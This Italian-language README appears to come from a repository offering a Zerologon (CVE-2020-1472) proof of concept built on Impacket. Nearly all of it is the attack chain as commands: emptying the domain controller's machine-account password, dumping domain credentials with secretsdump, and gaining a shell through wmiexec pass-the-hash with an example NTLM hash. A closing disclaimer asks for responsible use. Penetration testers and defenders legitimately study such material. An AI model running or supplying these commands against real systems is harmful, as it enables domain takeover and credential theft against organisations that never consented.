
Una prova di concetto pratica per CVE-2020-1472 (Zerologon) che utilizza la libreria Impacket per sfruttare la vulnerabilità Netlogon ed eseguire un accesso non autorizzato al controller di dominio.
Questo repository contiene un'implementazione aggiornata (2024) dell'exploit Zerologon combinato con gli strumenti Impacket per sfruttare la CVE-2020-1472 (Zerologon). Questo exploit prende di mira ambienti Windows Server per manipolare le password degli account macchina ed effettuare movimento laterale.
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 e 192.168.40.145 con il nome host e l'indirizzo IP effettivi del bersaglio.Utilizza questo strumento in modo responsabile. L'uso non autorizzato di questo strumento per sfruttare sistemi senza permesso esplicito è illegale e antietico. Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo strumento.